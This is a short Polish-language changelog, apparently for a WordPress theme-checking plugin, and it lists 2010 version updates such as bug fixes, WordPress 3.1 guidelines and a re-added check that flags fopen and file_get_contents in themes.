• Napraw sprawdzanie filtra embed_defaults i sprawdzanie danych pliku arkusza stylów.

20101226.1

• Przeprojektowanie całego systemu, aby umożliwić łatwiejszą synchronizację z programem do przesyłania WordPress.org. Wiele innych dodatków/odejmowań/zmian.
• Dodano wytyczne WordPress 3.1, aby pomóc autorom motywów zapewnić zgodność z nadchodzącym wydaniem.

20101110.7

• Ponownie dodano sprawdzanie malware.php pod kątem fopen i file_get_contents (INFO)
• naprawiono kilka niezdefiniowanych błędów indeksu.

20101110.4_r2

• Naprawiono ostrzeżenie: Nieprawidłowa liczba parametrów dla stristr()

20101110.4_r1

• Dodano echo do pliku sugerowanego.php

20101110.4

• Naprawiono przestarzałe wywołanie funkcji do get_plugins()

20101110.3

• Naprawiono niezdefiniowany indeks.

20101110.2

• Zaginiony< in main.php
• Dodano sprawdzanie warunkowe dla license.txt LUB tagów licencyjnych w style.css
• Ulepszenia interfejsu użytkownika.